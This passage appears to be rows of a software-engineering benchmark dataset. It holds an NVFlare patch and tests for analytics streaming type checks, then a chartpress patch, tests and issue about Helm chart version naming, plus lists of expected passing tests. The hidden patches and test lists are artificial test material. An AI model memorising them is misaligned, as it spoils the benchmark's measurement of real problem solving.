+ dxo.set_meta_prop(_DATA_TYPE_KEY, self.data_type)
+ dxo.set_meta_prop(_KWARGS_KEY, self.kwargs)
return dxo
@classmethod
@@ -59,16 +71,14 @@ class AnalyticsData:
dxo (DXO): The DXO object to convert.
"""
if not isinstance(dxo, DXO):
- raise TypeError(f"dxo is not of type DXO, instead it has type {type(dxo)}.")
+ raise TypeError(f"expect dxo to be an instance of DXO, but got {type(dxo)}.")
if len(dxo.data) != 1:
raise ValueError("dxo does not have the correct format for AnalyticsData.")
tag, value = list(dxo.data.items())[0]
- data_type = dxo.get_meta_prop(DATA_TYPE_KEY)
- kwargs = dxo.get_meta_prop(KWARGS_KEY)
- if not isinstance(data_type, AnalyticsDataType):
- raise ValueError(f"data_type {data_type} is not supported.")
+ data_type = dxo.get_meta_prop(_DATA_TYPE_KEY)
+ kwargs = dxo.get_meta_prop(_KWARGS_KEY)
return cls(tag, value, data_type, kwargs)
diff --git a/nvflare/app_common/widgets/streaming.py b/nvflare/app_common/widgets/streaming.py
index 588f381e..dcd82aaa 100644
--- a/nvflare/app_common/widgets/streaming.py
+++ b/nvflare/app_common/widgets/streaming.py
@@ -45,11 +45,11 @@ def send_analytic_dxo(comp: FLComponent, dxo: DXO, fl_ctx: FLContext, event_type
event_type (str): Event type.
"""
if not isinstance(comp, FLComponent):
- raise TypeError("expect comp to be FLComponent, but got {}".format(type(fl_ctx)))
+ raise TypeError(f"expect comp to be an instance of FLComponent, but got {type(comp)}")
if not isinstance(dxo, DXO):
- raise TypeError("expect fl_ctx to be FLContext, but got {}".format(type(fl_ctx)))
+ raise TypeError(f"expect dxo to be an instance of DXO, but got {type(dxo)}")
if not isinstance(fl_ctx, FLContext):
- raise TypeError("expect fl_ctx to be FLContext, but got {}".format(type(fl_ctx)))
+ raise TypeError(f"expect fl_ctx to be an instance of FLContext, but got {type(fl_ctx)}")
fl_ctx.set_prop(key=FLContextKey.EVENT_DATA, value=dxo.to_shareable(), private=True, sticky=False)
comp.fire_event(event_type=event_type, fl_ctx=fl_ctx)
@@ -117,7 +117,7 @@ class AnalyticsSender(Widget):
"""Sends analytics data.
This class implements some common methods follows signatures from PyTorch SummaryWriter and Python logger.
- It provides a convenient way for LearnerService to use.
+ It provides a convenient way for Learner to use.
"""
super().__init__()
self.engine = None
@@ -126,50 +126,66 @@ class AnalyticsSender(Widget):
if event_type == EventType.START_RUN:
self.engine = fl_ctx.get_engine()
- def _add(self, tag: str, value, data_type: AnalyticsDataType, kwargs: Optional[dict] = None):
+ def _add(
+ self,
+ tag: str,
+ value,
+ data_type: AnalyticsDataType,
+ global_step: Optional[int] = None,
+ kwargs: Optional[dict] = None,
+ ):
+ kwargs = kwargs if kwargs else {}
+ if global_step:
+ if not isinstance(global_step, int):
+ raise TypeError(f"Expect global step to be an instance of int, but got {type(global_step)}")
+ kwargs["global_step"] = global_step
dxo = _write(tag=tag, value=value, data_type=data_type, kwargs=kwargs)
with self.engine.new_context() as fl_ctx:
send_analytic_dxo(self, dxo=dxo, fl_ctx=fl_ctx)
- def add_scalar(self, tag: str, scalar: float, **kwargs):
+ def add_scalar(self, tag: str, scalar: float, global_step: Optional[int] = None, **kwargs):
"""Sends a scalar.
Args:
tag (str): Data identifier.
scalar (float): Value to send.
+ global_step (optional, int): Global step value.
**kwargs: Additional arguments to pass to the receiver side.
"""
- self._add(tag=tag, value=scalar, data_type=AnalyticsDataType.SCALAR, kwargs=kwargs)
+ self._add(tag=tag, value=scalar, data_type=AnalyticsDataType.SCALAR, global_step=global_step, kwargs=kwargs)
- def add_scalars(self, tag: str, scalars: dict, **kwargs):
+ def add_scalars(self, tag: str, scalars: dict, global_step: Optional[int] = None, **kwargs):
"""Sends scalars.
Args:
tag (str): The parent name for the tags.
scalars (dict): Key-value pair storing the tag and corresponding values.
+ global_step (optional, int): Global step value.
**kwargs: Additional arguments to pass to the receiver side.
"""
- self._add(tag=tag, value=scalars, data_type=AnalyticsDataType.SCALARS, kwargs=kwargs)
+ self._add(tag=tag, value=scalars, data_type=AnalyticsDataType.SCALARS, global_step=global_step, kwargs=kwargs)
- def add_text(self, tag: str, text: str, **kwargs):
+ def add_text(self, tag: str, text: str, global_step: Optional[int] = None, **kwargs):
"""Sends a text.
Args:
tag (str): Data identifier.
text (str): String to send.
+ global_step (optional, int): Global step value.
**kwargs: Additional arguments to pass to the receiver side.
"""
- self._add(tag=tag, value=text, data_type=AnalyticsDataType.TEXT, kwargs=kwargs)
+ self._add(tag=tag, value=text, data_type=AnalyticsDataType.TEXT, global_step=global_step, kwargs=kwargs)
- def add_image(self, tag: str, image, **kwargs):
+ def add_image(self, tag: str, image, global_step: Optional[int] = None, **kwargs):
"""Sends an image.
Args:
tag (str): Data identifier.
image: Image to send.
+ global_step (optional, int): Global step value.
**kwargs: Additional arguments to pass to the receiver side.
"""
- self._add(tag=tag, value=image, data_type=AnalyticsDataType.IMAGE, kwargs=kwargs)
+ self._add(tag=tag, value=image, data_type=AnalyticsDataType.IMAGE, global_step=global_step, kwargs=kwargs)
def _log(self, tag: LogMessageTag, msg: str, event_type: str, *args, **kwargs):
"""Logs a message.
@@ -210,6 +226,18 @@ class AnalyticsSender(Widget):
"""Logs a message with tag LogMessageTag.CRITICAL."""
self._log(tag=LogMessageTag.CRITICAL, msg=msg, event_type=_LOG_CRITICAL_EVENT_TYPE, args=args, kwargs=kwargs)
+ def flush(self):
+ """Flushes out the message.
+
+ This is doing nothing, it is defined for mimic the PyTorch SummaryWriter behavior.
+ """
+ pass
+
+ def close(self):
+ """Close resources."""
+ if self.engine:
+ self.engine = None
+
class AnalyticsReceiver(Widget, ABC):
def __init__(self, events: Optional[List[str]] = None):
@@ -223,6 +251,7 @@ class AnalyticsReceiver(Widget, ABC):
events = [_ANALYTIC_EVENT_TYPE, f"fed.{_ANALYTIC_EVENT_TYPE}"]
self.events = events
self._save_lock = Lock()
+ self._end = False
@abstractmethod
def initialize(self, fl_ctx: FLContext):
@@ -250,32 +279,34 @@ class AnalyticsReceiver(Widget, ABC):
Args:
fl_ctx (FLContext): fl context.
-
"""
pass
def handle_event(self, event_type: str, fl_ctx: FLContext):
if event_type == EventType.START_RUN:
self.initialize(fl_ctx)
- elif event_type in self.events:
+ elif event_type in self.events and not self._end:
data = fl_ctx.get_prop(FLContextKey.EVENT_DATA, None)
if data is None:
- self.log_error(fl_ctx, "Missing event data.")
+ self.log_error(fl_ctx, "Missing event data.", fire_event=False)
return
if not isinstance(data, Shareable):
- self.log_error(fl_ctx, f"Expect shareable but get {type(data)}")
+ self.log_error(
+ fl_ctx, f"Expect data to be an instance of shareable but get {type(data)}", fire_event=False
+ )
return
- record_origin = fl_ctx.get_identity_name()
# if fed event use peer name to save
if fl_ctx.get_prop(FLContextKey.EVENT_SCOPE) == EventScope.FEDERATION:
- peer_name = data.get_peer_prop(ReservedKey.IDENTITY_NAME, None)
- record_origin = peer_name
+ record_origin = data.get_peer_prop(ReservedKey.IDENTITY_NAME, None)
+ else:
+ record_origin = fl_ctx.get_identity_name()
if record_origin is None:
- self.log_error(fl_ctx, "record_origin can't be None.")
+ self.log_error(fl_ctx, "record_origin can't be None.", fire_event=False)
return
with self._save_lock:
self.save(shareable=data, fl_ctx=fl_ctx, record_origin=record_origin)
elif event_type == EventType.END_RUN:
+ self._end = True
self.finalize(fl_ctx)
|
NVIDIA/NVFlare
|
94dfcbbd33db8746297d39c06cfa0955592fd255
|
diff --git a/test/test_analytix.py b/test/test_analytix.py
new file mode 100644
index 00000000..1b61d292
--- /dev/null
+++ b/test/test_analytix.py
@@ -0,0 +1,94 @@
+# Copyright (c) 2021, NVIDIA CORPORATION.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import pytest
+
+from nvflare.apis.analytix import _DATA_TYPE_KEY, _KWARGS_KEY, AnalyticsData, AnalyticsDataType
+from nvflare.apis.dxo import DXO, DataKind
+
+FROM_DXO_TEST_CASES = [
+ ("hello", 3.0, AnalyticsDataType.SCALAR),
+ ("world", "text", AnalyticsDataType.TEXT),
+ ("dict", {"key": 1.0}, AnalyticsDataType.SCALARS),
+]
+
+TO_DXO_TEST_CASES = [
+ AnalyticsData(tag="hello", value=3.0, data_type=AnalyticsDataType.SCALAR),
+ AnalyticsData(tag="world", value="text", data_type=AnalyticsDataType.TEXT),
+ AnalyticsData(tag="dict", value={"key": 1.0}, data_type=AnalyticsDataType.SCALARS),
+]
+
+FROM_DXO_INVALID_TEST_CASES = [
+ (dict(), TypeError, f"expect dxo to be an instance of DXO, but got {type(dict())}."),
+ (
+ DXO(data_kind=DataKind.WEIGHTS, data={"w": 1.0}),
+ TypeError,
+ f"expect data_type to be an instance of AnalyticsDataType, but got {type(None)}.",
+ ),
+]
+
+INVALID_TEST_CASES = [
+ (
+ dict(),
+ 1.0,
+ AnalyticsDataType.SCALAR,
+ None,
+ TypeError,
+ f"expect tag to be an instance of str, but got {type(dict())}.",
+ ),
+ (
+ "tag",
+ 1.0,
+ "scalar",
+ None,
+ TypeError,
+ f"expect data_type to be an instance of AnalyticsDataType, but got {type('')}.",
+ ),
+ (
+ "tag",
+ 1.0,
+ AnalyticsDataType.SCALAR,
+ [1],
+ TypeError,
+ f"expect kwargs to be an instance of dict, but got {type(list())}.",
+ ),
+]
+
+
+class TestAnalytix:
+ @pytest.mark.parametrize("tag,value,data_type,kwargs,expected_error,expected_msg", INVALID_TEST_CASES)
+ def test_invalid(self, tag, value, data_type, kwargs, expected_error, expected_msg):
+ with pytest.raises(expected_error, match=expected_msg):
+ _ = AnalyticsData(tag=tag, value=value, data_type=data_type, kwargs=kwargs)
+
+ @pytest.mark.parametrize("tag,value,data_type", FROM_DXO_TEST_CASES)
+ def test_from_dxo(self, tag, value, data_type):
+ dxo = DXO(data_kind=DataKind.ANALYTIC, data={tag: value})
+ dxo.set_meta_prop(_DATA_TYPE_KEY, data_type)
+ result = AnalyticsData.from_dxo(dxo)
+ assert result.tag == tag
+ assert result.value == value
+
+ @pytest.mark.parametrize("data", TO_DXO_TEST_CASES)
+ def test_to_dxo(self, data: AnalyticsData):
+ result = data.to_dxo()
+ assert result.data_kind == DataKind.ANALYTIC
+ assert result.data == {data.tag: data.value}
+ assert result.get_meta_prop(_DATA_TYPE_KEY) == data.data_type
+ assert result.get_meta_prop(_KWARGS_KEY) == data.kwargs
+
+ @pytest.mark.parametrize("dxo,expected_error,expected_msg", FROM_DXO_INVALID_TEST_CASES)
+ def test_from_dxo_invalid(self, dxo, expected_error, expected_msg):
+ with pytest.raises(expected_error, match=expected_msg):
+ _ = AnalyticsData.from_dxo(dxo)
diff --git a/test/test_streaming.py b/test/test_streaming.py
new file mode 100644
index 00000000..b1a105c1
--- /dev/null
+++ b/test/test_streaming.py
@@ -0,0 +1,54 @@
+# Copyright (c) 2021, NVIDIA CORPORATION.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import pytest
+
+from nvflare.apis.dxo import DXO, DataKind
+from nvflare.apis.fl_component import FLComponent
+from nvflare.apis.fl_context import FLContext
+from nvflare.app_common.widgets.streaming import send_analytic_dxo, write_scalar, write_scalars, write_text, write_image
+
+INVALID_TEST_CASES = [
+ (list(), dict(), FLContext(), TypeError, f"expect comp to be an instance of FLComponent, but got {type(list())}"),
+ (FLComponent(), dict(), FLContext(), TypeError, f"expect dxo to be an instance of DXO, but got {type(dict())}"),
+ (
+ FLComponent(),
+ DXO(data={"k": "v"}, data_kind=DataKind.ANALYTIC),
+ list(),
+ TypeError,
+ f"expect fl_ctx to be an instance of FLContext, but got {type(list())}",
+ ),
+]
+
+INVALID_WRITE_TEST_CASES = [
+ (write_scalar, list(), 1.0, TypeError, f"expect tag to be an instance of str, but got {type(list())}"),
+ (write_scalar, "tag", list(), TypeError, f"expect value to be an instance of float, but got {type(list())}"),
+ (write_scalars, list(), 1.0, TypeError, f"expect tag to be an instance of str, but got {type(list())}"),
+ (write_scalars, "tag", 1.0, TypeError, f"expect value to be an instance of dict, but got {type(1.0)}"),
+ (write_text, list(), 1.0, TypeError, f"expect tag to be an instance of str, but got {type(list())}"),
+ (write_text, "tag", 1.0, TypeError, f"expect value to be an instance of str, but got {type(1.0)}"),
+ (write_image, list(), 1.0, TypeError, f"expect tag to be an instance of str, but got {type(list())}"),
+]
+
+
+class TestStreaming:
+ @pytest.mark.parametrize("comp,dxo,fl_ctx,expected_error,expected_msg", INVALID_TEST_CASES)
+ def test_invalid_send_analytic_dxo(self, comp, dxo, fl_ctx, expected_error, expected_msg):
+ with pytest.raises(expected_error, match=expected_msg):
+ send_analytic_dxo(comp=comp, dxo=dxo, fl_ctx=fl_ctx)
+
+ @pytest.mark.parametrize("func,tag,value,expected_error,expected_msg", INVALID_WRITE_TEST_CASES)
+ def test_invalid_write_func(self, func, tag, value, expected_error, expected_msg):
+ with pytest.raises(expected_error, match=expected_msg):
+ func(tag, value)
|
Errors in streaming.py
@yanchengnv notice some issues in nvflare/app_common/widgets/streaming.py:
- Line 47 to Line 52, the checking of the args and error messages are wrong.
- All these write_xxx() methods, should check the tag and data arg and make sure they are what we expect (str, dict, …)
- Line 257, in the call self.log_xxx(), we should set send_event=False; otherwise it may cause recursive events
- Since fed events are handled by a separate thread, there is a potential racing condition that a fed event could be fired after END_RUN event. In the Receiver code, we need to make sure to discard other events after END_RUN (and hence finalize) is done.
|
0.0
|
94dfcbbd33db8746297d39c06cfa0955592fd255
|
[
"test/test_analytix.py::TestAnalytix::test_invalid[tag0-1.0-AnalyticsDataType.SCALAR-None-TypeError-expect",
"test/test_analytix.py::TestAnalytix::test_invalid[tag-1.0-scalar-None-TypeError-expect",
"test/test_analytix.py::TestAnalytix::test_invalid[tag-1.0-AnalyticsDataType.SCALAR-kwargs2-TypeError-expect",
"test/test_analytix.py::TestAnalytix::test_from_dxo[hello-3.0-AnalyticsDataType.SCALAR]",
"test/test_analytix.py::TestAnalytix::test_from_dxo[world-text-AnalyticsDataType.TEXT]",
"test/test_analytix.py::TestAnalytix::test_from_dxo[dict-value2-AnalyticsDataType.SCALARS]",
"test/test_analytix.py::TestAnalytix::test_to_dxo[data0]",
"test/test_analytix.py::TestAnalytix::test_to_dxo[data1]",
"test/test_analytix.py::TestAnalytix::test_to_dxo[data2]",
"test/test_analytix.py::TestAnalytix::test_from_dxo_invalid[dxo0-TypeError-expect",
"test/test_analytix.py::TestAnalytix::test_from_dxo_invalid[dxo1-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_send_analytic_dxo[comp0-dxo0-fl_ctx0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_send_analytic_dxo[comp1-dxo1-fl_ctx1-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_send_analytic_dxo[comp2-dxo2-fl_ctx2-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_scalar-tag0-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_scalar-tag-value1-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_scalars-tag2-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_scalars-tag-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_text-tag4-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_text-tag-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_image-tag6-1.0-TypeError-expect"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-12-08 22:42:30+00:00
|
apache-2.0
| 389
|
|
jupyterhub__chartpress-64
|
diff --git a/.travis.yml b/.travis.yml
index a47cf03..998bf51 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -5,11 +5,12 @@ cache: pip
install:
- set -e
- pip install --upgrade pip
- - pip install pyflakes .
+ - pip install pyflakes pytest .
script:
- chartpress --version
- chartpress --help
- pyflakes .
+ - pytest -v ./tests
# This is a workaround to an issue caused by the existence of a docker
# registrymirror in our CI environment. Without this fix that removes the
diff --git a/README.md b/README.md
index 7dbf6a9..6caa976 100644
--- a/README.md
+++ b/README.md
@@ -157,3 +157,19 @@ in your `.travis.yml`:
git:
depth: false
```
+
+## Development
+
+Testing of this python package can be done using [`pyflakes`](https://github.com/PyCQA/pyflakes) and [`pytest`](https://github.com/pytest-dev/pytest). There is also some additional testing that is only run as part of TravisCI, as declared in [`.travis.yml`](.travis.yml).
+
+```
+# install chartpress locally
+pip install -e .
+
+# install dev dependencies
+pip install pyflakes pytest
+
+# run tests
+pyflakes .
+pytest -v
+```
diff --git a/chartpress.py b/chartpress.py
index df0fb19..1685946 100755
--- a/chartpress.py
+++ b/chartpress.py
@@ -10,6 +10,7 @@ from collections.abc import MutableMapping
from functools import lru_cache, partial
import os
import pipes
+import re
import shutil
import subprocess
from tempfile import TemporaryDirectory
@@ -55,29 +56,42 @@ def git_remote(git_repo):
return 'git@github.com:{0}'.format(git_repo)
-def last_modified_commit(*paths, **kwargs):
- """Get the last commit to modify the given paths"""
- return check_output([
- 'git',
- 'log',
- '-n', '1',
- '--pretty=format:%h',
- '--',
- *paths
- ], **kwargs).decode('utf-8').strip()
+def latest_tag_or_mod_commit(*paths, **kwargs):
+ """
+ Get the latest of a) the latest tagged commit, or b) the latest modification
+ commit to provided path.
+ """
+ latest_modification_commit = check_output(
+ [
+ 'git', 'log',
+ '--max-count=1',
+ '--pretty=format:%h',
+ '--',
+ *paths,
+ ],
+ **kwargs,
+ ).decode('utf-8').strip()
+ git_describe_head = check_output(
+ [
+ 'git', 'describe', '--tags', '--long'
+ ],
+ **kwargs,
+ ).decode('utf-8').strip().rsplit("-", maxsplit=2)
+ latest_tagged_commit = git_describe_head[2][1:]
-def last_modified_date(*paths, **kwargs):
- """Return the last modified date (as a string) for the given paths"""
- return check_output([
- 'git',
- 'log',
- '-n', '1',
- '--pretty=format:%cd',
- '--date=iso',
- '--',
- *paths
- ], **kwargs).decode('utf-8').strip()
+ try:
+ check_call(
+ [
+ 'git', 'merge-base', '--is-ancestor', latest_tagged_commit, latest_modification_commit,
+ ],
+ **kwargs,
+ )
+ except subprocess.CalledProcessError:
+ # latest_tagged_commit was newer than latest_modification_commit
+ return latest_tagged_commit
+ else:
+ return latest_modification_commit
def render_build_args(image_options, ns):
@@ -179,7 +193,55 @@ def image_needs_building(image):
return image_needs_pushing(image)
-def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_build=False, long=False):
+def _get_identifier(tag, n_commits, commit, long):
+ """
+ Returns a chartpress formatted chart version or image tag (identifier) with
+ a build suffix.
+
+ This function should provide valid Helm chart versions, which means they
+ need to be valid SemVer 2 version strings. It also needs to return valid
+ image tags, which means they need to not contain `+` signs either.
+
+ Example:
+ tag="0.1.2", n_commits="5", commit="asdf1234", long=True,
+ should return "0.1.2-005.asdf1234".
+ """
+ n_commits = int(n_commits)
+
+ if n_commits > 0 or long:
+ if "-" in tag:
+ # append a pre-release tag, with a . separator
+ # 0.1.2-alpha.1 -> 0.1.2-alpha.1.n.sha
+ return f"{tag}.{n_commits:03d}.{commit}"
+ else:
+ # append a release tag, with a - separator
+ # 0.1.2 -> 0.1.2-n.sha
+ return f"{tag}-{n_commits:03d}.{commit}"
+ else:
+ return f"{tag}"
+
+
+def _strip_identifiers_build_suffix(identifier):
+ """
+ Return a stripped chart version or image tag (identifier) without its build
+ suffix (.005.asdf1234), leaving it to represent a Semver 2 release or
+ pre-release.
+
+ Example:
+ identifier: "0.1.2-005.asdf1234" returns: "0.1.2"
+ identifier: "0.1.2-alpha.1.005.asdf1234" returns: "0.1.2-alpha.1"
+ """
+ # split away official SemVer 2 build specifications if used
+ if "+" in identifier:
+ return identifier.split("+", maxsplit=1)[0]
+
+ # split away our custom build specification: something ending in either
+ # . or - followed by three or more digits, a dot, an commit sha of four
+ # or more alphanumeric characters.
+ return re.sub(r'[-\.]\d{3,}\.\w{4,}\Z', "", identifier)
+
+
+def build_images(prefix, images, tag=None, push=False, chart_version=None, skip_build=False, long=False):
"""Build a collection of docker images
Args:
@@ -191,9 +253,9 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
to modify the image's files.
push (bool):
Whether to push the resulting images (default: False).
- chart_tag (str):
- The latest chart tag, included as a prefix on image tags
- if `tag` is not specified.
+ chart_version (str):
+ The latest chart version, trimmed from its build suffix, will be included
+ as a prefix on image tags if `tag` is not specified.
skip_build (bool):
Whether to skip the actual image build (only updates tags).
long (bool):
@@ -204,38 +266,35 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
Example 1:
- long=False: 0.9.0
- - long=True: 0.9.0_000.asdf1234
+ - long=True: 0.9.0-000.asdf1234
Example 2:
- - long=False: 0.9.0_004.sdfg2345
- - long=True: 0.9.0_004.sdfg2345
+ - long=False: 0.9.0-004.sdfg2345
+ - long=True: 0.9.0-004.sdfg2345
"""
value_modifications = {}
for name, options in images.items():
image_path = options.get('contextPath', os.path.join('images', name))
image_tag = tag
+ chart_version = _strip_identifiers_build_suffix(chart_version)
# include chartpress.yaml itself as it can contain build args and
# similar that influence the image that would be built
paths = list(options.get('paths', [])) + [image_path, 'chartpress.yaml']
- last_image_commit = last_modified_commit(*paths)
- if tag is None:
- n_commits = int(check_output(
+ image_commit = latest_tag_or_mod_commit(*paths, echo=False)
+ if image_tag is None:
+ n_commits = check_output(
[
'git', 'rev-list', '--count',
- # Note that the 0.0.1 chart_tag may not exist as it was a
+ # Note that the 0.0.1 chart_version may not exist as it was a
# workaround to handle git histories with no tags in the
- # current branch. Also, if the chart_tag is a later git
- # reference than the last_image_commit, this command will
- # return 0.
- f'{chart_tag + ".." if chart_tag != "0.0.1" else ""}{last_image_commit}',
+ # current branch. Also, if the chart_version is a later git
+ # reference than the image_commit, this
+ # command will return 0.
+ f'{"" if chart_version == "0.0.1" else chart_version + ".."}{image_commit}',
],
echo=False,
- ).decode('utf-8').strip())
-
- if n_commits > 0 or long:
- image_tag = f"{chart_tag}_{int(n_commits):03d}-{last_image_commit}"
- else:
- image_tag = f"{chart_tag}"
+ ).decode('utf-8').strip()
+ image_tag = _get_identifier(chart_version, n_commits, image_commit, long)
image_name = prefix + name
image_spec = '{}:{}'.format(image_name, image_tag)
@@ -251,7 +310,7 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
build_args = render_build_args(
options,
{
- 'LAST_COMMIT': last_image_commit,
+ 'LAST_COMMIT': image_commit,
'TAG': image_tag,
},
)
@@ -315,34 +374,43 @@ def build_chart(name, version=None, paths=None, long=False):
Example versions constructed:
- 0.9.0-alpha.1
- - 0.9.0-alpha.1+000.asdf1234 (--long)
- - 0.9.0-alpha.1+005.sdfg2345
- - 0.9.0-alpha.1+005.sdfg2345 (--long)
+ - 0.9.0-alpha.1.000.asdf1234 (--long)
+ - 0.9.0-alpha.1.005.sdfg2345
+ - 0.9.0-alpha.1.005.sdfg2345 (--long)
+ - 0.9.0
+ - 0.9.0-002.dfgh3456
"""
chart_file = os.path.join(name, 'Chart.yaml')
with open(chart_file) as f:
chart = yaml.load(f)
- last_chart_commit = last_modified_commit(*paths)
-
if version is None:
+ chart_commit = latest_tag_or_mod_commit(*paths, echo=False)
+
try:
- git_describe = check_output(['git', 'describe', '--tags', '--long', last_chart_commit]).decode('utf8').strip()
+ git_describe = check_output(
+ [
+ 'git', 'describe', '--tags', '--long', chart_commit
+ ],
+ echo=False,
+ ).decode('utf8').strip()
latest_tag_in_branch, n_commits, sha = git_describe.rsplit('-', maxsplit=2)
-
- n_commits = int(n_commits)
- if n_commits > 0 or long:
- version = f"{latest_tag_in_branch}+{n_commits:03d}.{sha}"
- else:
- version = f"{latest_tag_in_branch}"
+ # remove "g" prefix output by the git describe command
+ # ref: https://git-scm.com/docs/git-describe#_examples
+ sha = sha[1:]
+ version = _get_identifier(latest_tag_in_branch, n_commits, sha, long)
except subprocess.CalledProcessError:
# no tags on branch: fallback to the SemVer 2 compliant version
- # 0.0.1+<n_comits>.<last_chart_commit>
- n_commits = int(check_output(
- ['git', 'rev-list', '--count', last_chart_commit],
+ # 0.0.1-<n_commits>.<chart_commit>
+ latest_tag_in_branch = "0.0.1"
+ n_commits = check_output(
+ [
+ 'git', 'rev-list', '--count', chart_commit
+ ],
echo=False,
- ).decode('utf-8').strip())
- version = f"0.0.1+{n_commits:03d}.{last_chart_commit}"
+ ).decode('utf-8').strip()
+
+ version = _get_identifier(latest_tag_in_branch, n_commits, chart_commit, long)
chart['version'] = version
@@ -510,10 +578,7 @@ def main():
images=chart['images'],
tag=args.tag if not args.reset else chart.get('resetTag', 'set-by-chartpress'),
push=args.push,
- # chart_tag will act as a image tag prefix, we can get it from
- # the chart_version by stripping away the build part of the
- # SemVer 2 compliant chart_version.
- chart_tag=chart_version.split('+')[0],
+ chart_version=chart_version,
skip_build=args.skip_build or args.reset,
long=args.long,
)
|
jupyterhub/chartpress
|
84df258b335fe19d56d3fc849a9241d9c4eb7afe
|
diff --git a/tests/test_regexp.py b/tests/test_regexp.py
new file mode 100644
index 0000000..b597655
--- /dev/null
+++ b/tests/test_regexp.py
@@ -0,0 +1,14 @@
+from chartpress import _strip_identifiers_build_suffix
+from chartpress import _get_identifier
+
+def test__strip_identifiers_build_suffix():
+ assert _strip_identifiers_build_suffix(identifier="0.1.2-005.asdf1234") == "0.1.2"
+ assert _strip_identifiers_build_suffix(identifier="0.1.2-alpha.1.005.asdf1234") == "0.1.2-alpha.1"
+
+def test__get_identifier():
+ assert _get_identifier(tag="0.1.2", n_commits="0", commit="asdf123", long=True) == "0.1.2-000.asdf123"
+ assert _get_identifier(tag="0.1.2", n_commits="0", commit="asdf123", long=False) == "0.1.2"
+ assert _get_identifier(tag="0.1.2", n_commits="5", commit="asdf123", long=False) == "0.1.2-005.asdf123"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="0", commit="asdf1234", long=True) == "0.1.2-alpha.1.000.asdf1234"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="0", commit="asdf1234", long=False) == "0.1.2-alpha.1"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="5", commit="asdf1234", long=False) == "0.1.2-alpha.1.005.asdf1234"
|
Pre-release replaced by later builds
I've found a reproducible issue since #52 relating to the use of chartpress. Apparently, if we use chartpress to publish a tagged commit, like `0.9.0-alpha.1`, and later use chartpress to publish a later commit, it appears that Helm chart repository's `index.yaml` will get its entry about `0.9.0-alpha.1` replaced by `0.9.0-alpha.1+001.g152b8c9a`, instead of having it added alongside...
https://github.com/jupyterhub/helm-chart/commit/29f7cbe19f5eba8cc76f2fefaa57d70ce2668495#diff-43a27642790006c93fea79f384f23b4fL2858-R2859
## Reproduction
You need chartpress and helm, where helm is initialized with `helm init --client-only`.
```
pip install chartpress=0.4.2
```
```
rm -rf /tmp/{z2jh,helm-chart,index}
mkdir /tmp/{z2jh,helm-chart,index}
pushd /tmp/helm-chart
git clone https://github.com/jupyterhub/helm-chart . --no-checkout
git checkout 6c4de08
popd
pushd /tmp/index
git init
helm repo index . --merge /tmp/helm-chart/index.yaml --url https://jupyterhub.github.io/helm-chart
git add index.yaml
git commit -m "index.yaml initial state: with 0.9.0-alpha.1"
rm --interactive=never /tmp/index/*
popd
pushd /tmp/z2jh
git clone https://github.com/jupyterhub/zero-to-jupyterhub-k8s . --no-checkout
git checkout 83af061d
chartpress --skip-build
helm package ./jupyterhub --destination /tmp/index
mv /tmp/index/jupyterhub-0.9.0-alpha.1+001.g152b8c9.tgz /tmp/index/jupyterhub-0.9.0-alpha.1_001.g152b8c9.tgz
popd
pushd /tmp/index
helm repo index . --merge /tmp/helm-chart/index.yaml --url https://jupyterhub.github.io/helm-chart
git add index.yaml
git commit -m "merge with 0.9.0-alpha.1+n.sha overrode 0.9.0-alpha.1 entry"
cp /tmp/index/* /tmp/helm-chart/
rm --interactive=never /tmp/index/*
#rm /tmp/index/index.yaml
popd
pushd /tmp/z2jh
git checkout 0.9.0-alpha.1
chartpress --skip-build
helm package ./jupyterhub --destination /tmp/index
popd
pushd /tmp/index
helm repo index . --merge /tmp/helm-chart/index.yaml --url https://jupyterhub.github.io/helm-chart
rm --interactive=never /tmp/index/jupyterhub-*
git add index.yaml
git commit -m "Should not do anything."
```
## Reproduction results
```diff
- apiVersion: v1
appVersion: 1.0.1dev
- created: "2019-10-17T22:17:04.353205591Z"
+ created: "2019-10-19T20:01:39.379225412+02:00"
description: Multi-user Jupyter installation
- digest: 4835bf4b9d3130ad5747052a0eec50f1e5b2ef5133b9084d3a4e5a9f3602cc3e
+ digest: 9789053b0136b06fe3be4e429c1b57d69cc097faac80cdaf21239afa36f650a7
home: https://z2jh.jupyter.org
icon: https://jupyter.org/assets/hublogo.svg
kubeVersion: '>=1.11.0-0'
@@ -2847,8 +2847,8 @@ entries:
- https://github.com/jupyterhub/zero-to-jupyterhub-k8s
